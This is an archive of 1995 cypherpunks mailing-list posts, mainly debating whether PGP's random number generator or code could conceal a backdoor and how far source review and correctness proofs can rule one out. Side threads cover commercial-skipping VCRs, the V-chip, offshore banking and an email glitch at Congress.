tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 2 Aug 95 03:05:21 PDT
To: fc@all.net (Fred Cohen)
Subject: some discussion of rannos in PGP (was: of a hole in PGP)
Message-ID: <28643.9508011023@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen <fc@all.net> writes on cpunks:
: PGP is a product that is specifically disliked by the powers that be
: because it provides free access to strong cryptography which is against
: the public policy of the US government.  That means that people in that
: same said government likely feel it is their duty to make certain that
: they can still read PGP mail.

Certainly granted!  Hence persecution of Phil Z.

A bit difficult to achieve in the presence of available source code, I
(and many others) are using PGP compiled by themselves.  That doesn't
prove there are no subtle back-doors but it rules out unsophisticated
backdoors in distributed executables.  (Even such things could be
checked if someone got suspicious, things can be reverse engineered).

Now to the question of what can be done practically to help further
validate PGPs authenticity, and freeness from back-doors.

The way I see it the only attack which you could reasonably expect to
pull off in terms of being subtle enough to hope to get away with
given full access to source is the random number generator.

The code which actually generates the random primes, and converts them
to PGP output format is reasonably short and well defined.  Wouldn't
take long to single step that and watch that nothing happened on the
way out to file.

Encryption is a similarly simple operation, M ^ e % n you could easily
check that manually (with a certain small piece of perl even).  Same
for generation of IDEA keys.

I don't really feel qualified to comment properly on the random number
generation, but to me (I looked at the source in fair detail) it looks
good.

I mean there is real entropy being generated (timing key strokes
against a high speed clock on PCs lower on UNIX systems typically)
and the stirring operation looks good, MD5 + XOR on key.

Presuming that the MD5 implementation is correct?  Seems a pretty good
likelihood to be, it's been given enough real world tests that you
could do a very nice probablistic statistical confidence test on it.
Which would easily say that it was correct to some huge degree of
certainty.

The legitimacy of using a high frequency clock to time intervals
between key strokes, seems a very good way of generating random
numbers.  I mean there is most definately *some* entropy being
generated, PGP makes reasonably conservative estimates of the amount
of entropy generated, and stirs the whole number in (not just the
expected entropy).

I'm not saying your comments aren't useful; they are, and analysis and
critique of the random number generation in particular is very
important.  Indeed given the sheer cost of factoring a 2048 bit RSA
modulus, or of brute forcing a 128bit IDEA key, it is indeed a
pertinent question as to whether any kind of brute force attack could
be generated on the random number generation, which could be slighly
cheaper than either of these.  128bits is a lot to play with.

To me it looks good, but then I'm not a cryptographer, and also there
is the kind of "NP problem aspect" to it all in that for reasonably
complex code it will not be apparent whether a proof is possible with
out looking at the specifics.

Still I think some analysis of the random number generation code would
be useful work.  I'm not expecting to see a flaw, but doesn't mean it
shouldn't be entered into with an open mind.

I think it does not fall in the same league as the apparent difficulty
of having a secure sendmail (you said a compromising couple of bugs
seem to get found a couple of times a year), for the reason that what
PGP is doing with it's random no generation is well defined, contained
in a few lines of code, and only really relying on a couple of
assertions:

	1) MD5 is itself not inherently flawed
	2) the MD5 implementation is correct
	3) key stroke timings are a source of a safely conservatively
	   estimatable amount of entropy
	4) the key generation method does not narrow the search space
	5) there are no other compromising bugs between key generation
	   of the key and it being written to the keyring

1) Heh, not a lot you can do about that.  Is it or isn't it?  Time
will tell.

2) Seems pretty likely to me there are test strings which come with
the RFC implemenation, and it would be unbelievably unlikely that it
should produce the complete set of tests and yet somehow still be
flawed.  Given that there are _no_ branches in the algorithm (ie just
various permutations and bit twidlings based on the key info, which
get mangled into the digest.

3) Pretty good I think, especially on a PC, which has a higher speed
timer.  Some entropy is surely generated, and with safe entropy
estimation, and cryptographically secure stirring, it sounds pretty
good to me.

4) For RSA keys, I don't think so, unless you believe that strong
primes will agains become important.  For current factoring algorithms
strong primes are just as hard to factor as a completely randomly
generated prime, except for certain primes which are in any have an
infinitesimal chance of occurring.  For IDEA keys there is little
value added over a striaght ran no, as there are no special properties
which an IDEA key must have.

5) I would assert is relatively trivial to demonstrate, a couple of
hours with a debugger should demonstrate that.  You could do testing
more rigourously, test every branch, so that you have checked that the
outcome is that the key gets written to the keyfile, with various
options, not utterly fool proof of course, but pretty darn good given
the simplicity.

On the more philosophical side, with the idea that you can never be
sure that folks aren't NSA agents with hidden agendas etc, well you
can't be sure.

But the open source and sheer number of folks reading is the best
argument against this.  That means that at least some true blue
cpunks, "live free or die" types will read it in earnest, and examine
very carefully.

Another philosophical argument against PGP having any cleverly hidden
"back-doors" in the form of purposefully weakened ran-no generators or
what have you is that the NSA et all hate PGP with such vehemence.
Heh if they don't like it, it must be good :-)

And remember, say NO to key escrow :-)

(It's no good having an ultra carefully validated PGP if you go to
jail for being caught with a copy on your HD, welcome to the Land of
the Freeh, and all you know.  May happens sooner than expected, then
the only folks using crypto will be the "live free or die" folks, plus
of course the criminals who figure they have more to hide and would
get in more trouble for what they are really up to than for a
"possesion of crypto" charge.)

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 1 Aug 95 11:23:03 PDT
To: Ray Cromwell <patl@lcs.mit.edu
Subject: Provably Correct Crypto?
Message-ID: <ac43be3d13021004ec3b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:15 PM 8/1/95, Ray Cromwell wrote:

>  That's a neat metaphor, but it doesn't always apply. It shouldn't
>apply to algorithms which are primitive recursive. Elementary
>algorithms like multiprecision add, sub, multiply, divide, modmult,
>and modexp (the basis of public key encryption) are all provably
>correct and all terminate. (the basis is polynomial operators over a
>ring) It is possible to verify the implementation (assuming the
>correctness of the compiler). Now there could be a "factoring"
>trapdoor in RSA, but that's a trapdoor not in the implementation of
>PGP, but in the algorithm itself. RSA-in-4-lines-perl is probably
                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>provably correct.  To guard against trapdoors in PGP, you should
 ^^^^^^^^^^^^^^^^^
>verify the correctness of the PRNG, Key Generator, and that no private
>key bits or session key bits are leaked. I would suspect this could be
>difficult, but approximations could be determined to within a high
>degree of confidence.

This doesn't seem likely. I mean, doesn't "RSA-in-4-lines-of-Perl" *of
necessity* make use of external library/utility functions? Such as the "dc"
math routines for the PRNG? Part of its compactness is that it makes use of
available libraries.

Anything that "reaches out" to external libraries or utilities would then
have the vulnerabilities of _those_ libraries and utilities, which may or
may not be provably correct themselves. (And the issue of any PRNG being
probably correct or not is of course an interesting, and deep, question.)

I do think the issues of modular design and provable correctness--or
approximations to it--are interesting ones.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 1 Aug 95 08:31:10 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <199507312340.TAA02533@toxicwaste.media.mit.edu>
Message-ID: <199508011530.LAA00429@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "warlord" == Derek Atkins <warlord@mit.edu> writes:

 warlord> This is where you are very wrong.  I am not saying that "if
 warlord> you can't find any holes it must be secure".  What I am
 warlord> saying is that the source is available, and thousands of
 warlord> people have looked at the source, and none of them have
 warlord> found any holes in it.

While I largely disagree with Dr. Cohen's conclusions, I do think we
should extinguish the "Examine the source!" mantra.

I find it surprising that people so familiar with public key
cryptography would be reassured by the argument, "Here, this algorithm
has been examined by thousands and nobody has found a trap door."
Public key cryptography demonstrates that it is possible, in
principle, to construct an algorithm with a trap door that nobody else
is *ever* going to find.  I wonder whether Rivest could construct a
hash function which only he could invert...  :-)

When an algorithm is essentially defined by a tangle of C code, like
the PGP random number generator, the "Examine the source!" mantra
becomes even more hollow.  Ironically, the fact that it was designed
by competent cryptographers potentially makes it even more dangerous.

Of course, there is no practical alternative at this time.  Maybe
someday your entire operating environment will be formally proven
correct, and the cryptographic algorithms will be provably as hard as
factoring, and factoring will be proven hard, and the system will ask
you to flip a coin and type "0" or "1" every time it needs a random
bit.  But until that day, you will have to decide whom to trust.

Personally, I trust the authors of PGP.  So do most of the people on
this list, I suspect.  Maybe Dr. Cohen can convince me that my trust
is misplaced; but to do so, he will need something better than NSA
conspiracy theories.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

iQCVAwUBMB5IU3r7ES8bepftAQGRvQP+Masb3fWdJg9UA6YYufuVZ5EZU8wfhuar
IXpjID+iSyVV1UnMN5CiWj8912H3buUslygVnbCwv/vnuKdtz5h9k2+lpCUX4r11
2QVAWg4ij1LiA1DU7N2l2K4oqb5mszVZrQcW6aJJzqiuPcvij5Vl7cN3hDTfdttJ
x9emd0xEjPA=
=nxBy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Tue, 1 Aug 95 09:40:32 PDT
To: cypherpunks@toad.com
Subject: Re: commerical busters
Message-ID: <01HTK2WJPWYQ001IQN@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


 
 ON: 31-JUL-1995 20:14:46.10, dan@netmarket.com wrote:
 
> At 8:50 PM 07/31/95, Patrick May wrote:
> 
> >     My dim memories from a project I did for Sony a couple of years
> >ago are that commercials are separated by a fixed number of black
> >frames and some, at least, have tracking information encoded so that
> >advertisers can monitor how often they are played.  I'll try to dig up
> >more info.
> 
> From: dfitzpat@interserv.com
>       Wednesday July 26, 1995 -- ShopTalk
> 
> - --
> 
> NEW VCRs TAKE ON COMMERCIALS POINT-BLANK
> 
>                         By Jonathan Takiff
>                Philadelphia Daily News Staff Writer
> 
> 
> Already besieged by Washington politicians over the content of TV
> programming (and threats of a show-blocking chip), television
> broadcasters are about to be hit with another whammy.  This time it's
> VCRs that automatically blank out commercials.
> 
> <snip>
> 
> $$$$ $$$$$ $$$$
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMB193KZKaCr9f/gtAQFa5AP/ZEmtSM/hSXb6zcFHDmv9Me0thtAqqCxZ
> 7COYgWxuLkl78+y/INpFKW861mrNig1UlO8Q+vDImKK3qUmTS1tzRWNIH9XVyYtA
> pJ05g/Z/WKUPx17jd2no9oRqut4bziLa4iMj59B/4nxAhIjEtE5TZFP6okCQ1HGm
> qbFhOteJavc=
> =Opny
> -----END PGP SIGNATURE-----
> 
                                                            dan
 Hello all,
 
 I have thought about this before, as usual my ideas are not new.
 My vision was like this.  
 
 1. Develop a few methods to recognize commercials through cable T.V.
 	a. The blank spaces between broadcasting?
 	b. Analysis of image information?
 	c. Analysis of sound information?
 	d. Understanding cable T.V. protocols?
 	e. etc? 
 
 2. My commerical buster would work on a delay.
 	a. The broadcast information would enter a queue.
 	b. The broadcast information would be evaulated.
 	c. If all of the tests for commericals passed, display.
 	d. If any of the tests fail, the T.V. goes blue, and
 		my CD player is served.
 	e. The time of delay is dependent on the time to analyze
 		the broadcast information.
 
 I wish it could happen, I hate commericals.
 
 Many Thanks,
 	

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 1 Aug 95 08:42:52 PDT
To: patl@lcs.mit.edu
Subject: Re: a hole in PGP
In-Reply-To: <199508011530.LAA00429@skyclad.lcs.mit.edu>
Message-ID: <199508011542.LAA23817@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



"Patrick J. LoPresti" writes:
> I find it surprising that people so familiar with public key
> cryptography would be reassured by the argument, "Here, this algorithm
> has been examined by thousands and nobody has found a trap door."
> Public key cryptography demonstrates that it is possible, in
> principle, to construct an algorithm with a trap door that nobody else
> is *ever* going to find.

This is not correct as you have phrased it.

Although it is not possible to find a decision proceedure for any
non-trivial property of programs in general (whether it halts, for
example) in practice well written code can be well understood and
cannot conceal very much at all.

In order to use public key cryptography to obfuscate a program as you
suggest, you'd have to include huge tables of large numbers in it. Any
idiot can observe the existance of such mysterious tables.

Trying to conceal anything in cleanly written code is an enormous
challenge, and one that has nothing to do with public key crypto per
se.

Incidently, this doesn't mean that you can't conceal things by
producing subtle flaws in, for example, random number generation code.
However, such flaws are hardly of the form "nobody else is *ever*
going to find" -- anyone being extremely cautious in his analysis will
find such flaws.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 1 Aug 95 08:45:39 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Sex & Crime TV filter
In-Reply-To: <ac425d4208021004ef6c@[205.199.118.202]>
Message-ID: <m0sdJV1-0009ywC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Wow! I think Ted just hit on something that could be used to quickly derail
> the "V-chip":
> 
> At 4:02 PM 7/31/95, Thaddeus J. Beier wrote:
> 
> >The chip that interprets the content does it solely based on the rating
> >information.  This is the so-called "v-chip" (v for violence, I think,
> >not for video) that you see in the press.
> ...
> >qualifications of most people.  Besides, what I would really
> >like to filter out, what I find to be incredibly violent to the
> >minds of children, is commercial advertising.  Private rating
> >services could take care of these, easily, as well.
> 
> I agree, of course, about it not being the role of government/FCC/etc. to
> mandate such ratings, such chips, etc.
> 
> However, to help derail this V-chip being mandated, what if we (I mean
> activists, writers of columns, etc.) "insisted" that _commercials_ be
> similarly labelled?
> 
> "Yes, if violence and sex is to be "voluntarily rated," we think that
> commercial advertising ought to be similarly rated."
> 
> It might be hard for the legislators to avoid the logic of this.
> Advertisers, fearing people would of course mute the commercials, would
> then quietly urge them to drop the whole idea.
> 
> --Tim May
> 
> ..........................................................................
> Timothy C. May         | Crypto Anarchy: encryption, digital money,
> tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
> 408-728-0152           | knowledge, reputations, information markets,
> Corralitos, CA         | black markets, collapse of governments.
> Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 


-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Tue, 1 Aug 95 10:52:32 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: a hole in PGP
In-Reply-To: <Pine.SUN.3.91.950801061213.9088A-100000@panix.com>
Message-ID: <Pine.3.89.9508011141.A5974-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, Duncan Frissell wrote:

> On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:
> 
> > Why (specifically) do you think so? Because you claim it? Because the
> > MIT maintainer claims it? You say MIT is not associated with the NSA,
> > but they have historically been funded by the NSA and other federal
> > agencies for work on information security.  Do you really think that the
> 
> Of course MIT was in the NSA's pocket back in 1978 when they mailed me 
> and 3,000 other people a copy of "A Proposal for a Public Key Encryption 
> System" and started this whole Public Key-Private Key thing.  It was all 
> part of a plot.  If they hadn't done that we might all be using stronger 
> systems today.

Sounds like another LD tentacle to me ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nsb@nsb.fv.com
Date: Tue, 1 Aug 95 09:07:11 PDT
To: Enzo Michelangeli <pgf@tyrell.net>
Subject: Re: Zimmermann legal fund
Message-ID: <9508011604.AB27380@ nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:20 PM 8/1/95 +0800, Enzo Michelangeli wrote:
>Now, my main objection to opening a US account is that it's unclear
>whether or not, for simply receiving payments there, a non-resident and
>non-citizen account holder like myself incurs in any tax liability with
>Uncle Sam's Inland Revenue. Can anybody on this list shed light on the 
>issue? Last time I checked, the guys at FV weren't sure either. 

The real question isn't based on your bank account, but on whether or not
Uncle Sam thinks you are "doing business in" the US.  This is the
fundamentally thorny question that is raised by cyberspace businesses. 
Having payments made to a US bank account may make it more likely that the
US will decide that you are doing so, but they could decide it anyway just
because  you have buyers in the  US, or because  you're using a US-based
payment server.  The laws are, to say the least, not clear on such points.

As a practical matter, however, it is true that using a US account will
make it easier for Uncle Sam to tax you if it decides that's appropriate. 
-- NB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 1 Aug 95 09:15:27 PDT
To: patl@lcs.mit.edu
Subject: Re: a hole in PGP
In-Reply-To: <199508011530.LAA00429@skyclad.lcs.mit.edu>
Message-ID: <199508011615.MAA19157@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >>>>> "warlord" == Derek Atkins <warlord@mit.edu> writes:
> 
>  warlord> This is where you are very wrong.  I am not saying that "if
>  warlord> you can't find any holes it must be secure".  What I am
>  warlord> saying is that the source is available, and thousands of
>  warlord> people have looked at the source, and none of them have
>  warlord> found any holes in it.
> 
> While I largely disagree with Dr. Cohen's conclusions, I do think we
> should extinguish the "Examine the source!" mantra.
> 
> I find it surprising that people so familiar with public key
> cryptography would be reassured by the argument, "Here, this algorithm
> has been examined by thousands and nobody has found a trap door."
> Public key cryptography demonstrates that it is possible, in
> principle, to construct an algorithm with a trap door that nobody else
> is *ever* going to find.  I wonder whether Rivest could construct a
> hash function which only he could invert...  :-)

  That's a neat metaphor, but it doesn't always apply. It shouldn't
apply to algorithms which are primitive recursive. Elementary
algorithms like multiprecision add, sub, multiply, divide, modmult,
and modexp (the basis of public key encryption) are all provably
correct and all terminate. (the basis is polynomial operators over a
ring) It is possible to verify the implementation (assuming the
correctness of the compiler). Now there could be a "factoring"
trapdoor in RSA, but that's a trapdoor not in the implementation of
PGP, but in the algorithm itself. RSA-in-4-lines-perl is probably
provably correct.  To guard against trapdoors in PGP, you should
verify the correctness of the PRNG, Key Generator, and that no private
key bits or session key bits are leaked. I would suspect this could be
difficult, but approximations could be determined to within a high
degree of confidence.

-Ray


   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 31 Jul 95 21:46:21 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Zimmermann legal fund
In-Reply-To: <199508010129.AA00881@tyrell.net>
Message-ID: <Pine.LNX.3.91.950801115138.12351A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Phil Fraering wrote:

>    Date: Mon, 31 Jul 1995 12:12:16 +0800 (HKT)
>    From: Enzo Michelangeli <enzo@ima.com>
> 
>    How could it be worse than with the U.S. of A.?? ;-)
> 
> OK... think about Venezuela. It has bad inflation. It has laws against
> converting local currency to US dollars on the black market, which is
> basically defined as any agency/person/corporate entity exchanging at
> a worse rate than the government rate (at least in Venezuela itself;
[...]

Hey, I was joking: even without arriving to such extremes, banking in
Europe is, more often than not, a much worse experience than in USA. My
point, anyway, was that there are many offshore banking centres where you
may keep accounts denominated in USD, Deutsche Marks, Swiss Francs or
other reputable currencies, and also choose branches of reputable
international banks, even American ones if you like (Citybank, Chase and
many other are represented world-wide). Personally, as bank I like the
HSBC Holdings group or other "British-overseas" institutions like Standard
Chartered, and as haven currency the Singapore Dollar (due to the very strong
balance sheet of that country). In any case, the depositor may choose.

Unfortunately, the costs of international transfers of funds are still
pretty high, even between branches of the same bank. If I remit funds from
Hong Kong to another country, my bank charges me HKD 100. (around USD 20)
per operation, flat. In other countries there are additional commissions
proportional to the amount (0.125% from Singapore, 0.1% from Macau etc).
Sometimes, charges are levied on incoming remittances too. That situation
is partly dependent on the regulatory framework, and partly on the
oligopolistic nature of the banking business. In any case, it makes
international transfers not viable for the settlement of small bills; that
may be the reason why First Virtual is still stuck with USA-only merchant
accounts. 

Now, my main objection to opening a US account is that it's unclear
whether or not, for simply receiving payments there, a non-resident and
non-citizen account holder like myself incurs in any tax liability with
Uncle Sam's Inland Revenue. Can anybody on this list shed light on the 
issue? Last time I checked, the guys at FV weren't sure either. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Tue, 1 Aug 95 09:25:00 PDT
To: lindat@iquest.net (Dr. Linda D. Thompson - American Justice Federation)
Subject: Re: Software Glitch FYI
In-Reply-To: <m0sdBF0-001ehcC@dorite1.iquest.net>
Message-ID: <9508011623.AA01033@waller.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I would think that it is in fact necessary for Congress to fix
their email system.  Asking me to change my work habits to make the
Congressmen's lives easier is a prime example of whats wrong with
Congress.  30 millions people should act differently so that
postmaster@house.gov doesn't have to do his job?


| A Congressman's aid called me today to explain that if you send email to all
| the Congressmen's offices at one time, the software at their end causes each
| Congressman to receive 50 copies.
| 
| Please be sure everyone is aware of this glitch.
| 
| To prevent 50 copies from being sent to each Congressman, it is necessary to
| break the mailing list into 5-10 addresses at a time.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 1 Aug 95 09:34:31 PDT
To: perry@panix.com ("Perry E. Metzger")
Subject: Re: a hole in PGP
In-Reply-To: <199508011542.LAA23817@panix4.panix.com>
Message-ID: <199508011634.MAA00496@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "perry" == "Perry E Metzger" <perry@panix.com> writes:

 perry> "Patrick J. LoPresti" writes:

 >> I find it surprising that people so familiar with public key
 >> cryptography would be reassured by the argument, "Here, this
 >> algorithm has been examined by thousands and nobody has found a
 >> trap door."  Public key cryptography demonstrates that it is
 >> possible, in principle, to construct an algorithm with a trap door
 >> that nobody else is *ever* going to find.

 perry> This is not correct as you have phrased it.

On the contrary, it is *precisely* correct as I have phrased it.

 perry> Although it is not possible to find a decision proceedure for
 perry> any non-trivial property of programs in general (whether it
 perry> halts, for example) in practice well written code can be well
 perry> understood and cannot conceal very much at all.

Check my phrasing again.  Note the use of "in principle".

Whether the principle applies in practice is certainly a matter for
debate.  I would point out that 1) PGP is hardly well written code,
and 2) many current cryptographic algorithms make ideal places for
concealing all sorts of things.

 perry> In order to use public key cryptography to obfuscate a program
 perry> as you suggest, you'd have to include huge tables of large
 perry> numbers in it. Any idiot can observe the existance of such
 perry> mysterious tables.

Sorry, I can't resist.  From "md5.c" in the PGP distribution:

/*
 * Start MD5 accumulation.  Set bit count to 0 and buffer to mysterious
 * initialization constants.
 */
void MD5Init(struct MD5Context *ctx)
{
...


(Note: Of course I don't think that MD5 has a back door, but that has
more to do with my trust of Rivest than the fact the algorithm is
public.)

 perry> Trying to conceal anything in cleanly written code is an
 perry> enormous challenge, and one that has nothing to do with public
 perry> key crypto per se.

By "cleanly written code", I presume you mean code which is either
formally proven to be a correct implementation, or code which is so
transparent that it is "obviously" a correct implementation.  PGP's
random number generator is neither.

Moreover, as I precisely mentioned, the algorithms themselves can
conceal back doors.  This has plenty to do with public key
cryptography.  A reduction proof from a known hard problem would make
this virtually impossible, but there is no such proof for PGP's random
number generator.  (Nor for any other algorithm used by PGP, although
I admit RSA comes close.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

iQCVAwUBMB5XVXr7ES8bepftAQGkJgP9Gopf96k2vu5ORjqQCOk0hPNrdwtmcR71
THm+nPgWk2m1CHGXHF3FhgZ7FNZS8zubv1fzunKA+QDFcqKghHCFfhD+pof4bUF6
fYVq89Oc3P7/pIvS3pCR8BBN/8BTLwxlP+OsPbF4YNANXqsbiqyjvezruojKaOI8
QiVInZxdeoI=
=BfP6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Tue, 1 Aug 95 05:50:05 PDT
Subject: Re: Commercial killers
In-Reply-To: <199508010210.WAA28165@hermes.bwh.harvard.edu>
Message-ID: <1995Aug1.123538.8037@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu> writes:

>	Yes, but the tv stations put in a short period of black &
>silence before returning to the show.  I'm pretty confident that this
>is what the 'zip through commercials' vcrs cue on.

Darned close.  The article I saw said it detects the period of black
and silence and puts a `notch' on the tape at each such switch.  The
notch can be detected at fast-forward speeds.  My question is - what
happens if there is black/silence *between commercials*?  How does
the VCR know that what follows a mark is show or merely the next
commercial?
-- 
Simmons' Law Of Alcoholic Expectations:
  The best stuff always happens after the meeting, when everyone goes to
  the bar.
Correlary: Any meeting which doesn't adjourn to the bar isn't worth going to.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Evans <devans@hclb.demon.co.uk>
Date: Tue, 1 Aug 95 07:32:41 PDT
To: cypherpunks@toad.com
Subject: Re: Mail2news Gates
In-Reply-To: <1ef_9507281405@gigo.com>
Message-ID: <807306266snx@hclb.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In article <1ef_9507281405@gigo.com> you write:

> Suddenly, @news.demon.co.uk, which has worked well for ages, is rejecting
> posts:


I've posted a message about this to a local demon newsgroup.   I
haven't seen any announcement about withdrawing mail2news access from
non-Demon subscribers.  

The mail2news gateway has been abused with spam  from some large ISPs
(guess which one? ), but Demon's policy seems to be that they deal with
such problems on an individual or site basis.

It is possible there was a configuration error at demon which may have
been fixed by now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 1 Aug 95 09:55:43 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <199508011615.MAA19157@clark.net>
Message-ID: <199508011655.MAA00520@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "rjc" == Ray Cromwell <rjc@clark.net> writes:

 rjc>   That's a neat metaphor, but it doesn't always apply. It
 rjc> shouldn't apply to algorithms which are primitive
 rjc> recursive. Elementary algorithms like multiprecision add, sub,
 rjc> multiply, divide, modmult, and modexp (the basis of public key
 rjc> encryption) are all provably correct and all terminate. (the
 rjc> basis is polynomial operators over a ring) It is possible to
 rjc> verify the implementation (assuming the correctness of the
 rjc> compiler). Now there could be a "factoring" trapdoor in RSA, but
 rjc> that's a trapdoor not in the implementation of PGP, but in the
 rjc> algorithm itself. RSA-in-4-lines-perl is probably provably
 rjc> correct.  To guard against trapdoors in PGP, you should verify
 rjc> the correctness of the PRNG, Key Generator, and that no private
 rjc> key bits or session key bits are leaked. I would suspect this
 rjc> could be difficult, but approximations could be determined to
 rjc> within a high degree of confidence.

As I suggested, you could 1) only use algorithms which are provably as
hard to break as known hard problems, and 2) only use implementations
which are proven correct.  PGP does neither.  In addition, the
complexity of the source makes #2 difficult even to approximate.

Now, we could certainly take care of #1 fairly easily by using a
different set of algorithms.  And as you suggest, #2 can be
approximated if the code is written cleanly.  But this would be a big
project, and it would not be PGP.

I personally would find such a project pointless, since I trust PGP
enough for my needs.  The availability of the source is a necessary
prerequisite for that trust, but it is by no means convincing.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

iQCVAwUBMB5cZHr7ES8bepftAQFtBwQA2qDiS0BpvkFBj9HRRd/83OxjSczna/jn
wj5eb+2KMSbj87SuD3ByUFcXQmWIqO6bNq5CkzoxmGvrk/y1futjAF/BeGcVlM1+
T4ClfmrIFbqwd/j7i1Qaw7ExN6rNjgQUdRYmo8Nlr1JVaAymCtx2f4GqKRuwP3oy
Tc/W8GXThM0=
=qdFB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
